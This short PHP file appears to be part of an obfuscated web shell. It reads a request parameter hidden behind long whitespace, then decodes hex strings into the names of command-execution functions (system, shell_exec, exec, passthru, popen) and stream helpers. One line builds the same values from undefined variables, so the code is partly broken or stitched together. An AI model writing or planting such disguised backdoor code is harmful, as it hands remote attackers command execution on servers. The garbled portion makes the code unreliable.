<?php
																																										trim($_REQUEST['fuTefX']);
 $created6 = pack("H*", '7'.'3'.$identifier3.$identifier4.$identifier3.$identifier11.$identifier5.$identifier7.'6'.'1'.$identifier5.'d'.$identifier7.'f'.'6'.'7'.$identifier5.$identifier7.'7'.'4'.'5'.'f'.$identifier5.'3'.$identifier5.$identifier12.'6'.$identifier13.$identifier3.'4'.$identifier5.$identifier7.'6'.'e'.'7'.'4'.'7'.'3');$created7 = pack("H*", $identifier3.$identifier14.$identifier5.'3'.'6'.'c'.$identifier5.$identifier12.'7'.$identifier1.'6'.'5');
																																										


$variable1 = '73';
$variable2 = '79';
$variable3 = '74';
$variable4 = '6d';
$variable5 = '68';
$variable6 = '6c';
$variable7 = '5f';
$variable8 = '65';
$variable9 = '75';
$variable10 = '63';
$variable11 = '70';
$variable12 = '6f';
$created1 = pack("H*", $variable1 . $variable2 . '73' . $variable3 . '65' . $variable4);
$created2 = pack("H*", '73' . $variable5 . '65' . $variable6 . $variable6 . $variable7 . '65' . '78' . $variable8 . '63');
$created3 = pack("H*", '65' . '78' . $variable8 . '63');
$created4 = pack("H*", '70' . '61' . $variable1 . '73' . '74' . $variable5 . '72' . $variable9);
$created5 = pack("H*", '70' . '6f' . '70' . '65' . '6e');
$created6 = pack("H*", '73' . '74' . '72' . '65' . '61' . $variable4 . '5f' . '67' . $variable8 . '74' . '5f' . $variable10 . '6f' . '6e' . '74' . $variable8 . '6e' . '74' . '73');
$created7 = pack("H*", $variable11 . $variable10 . $variable6 . $variable12 . '73' . '65');

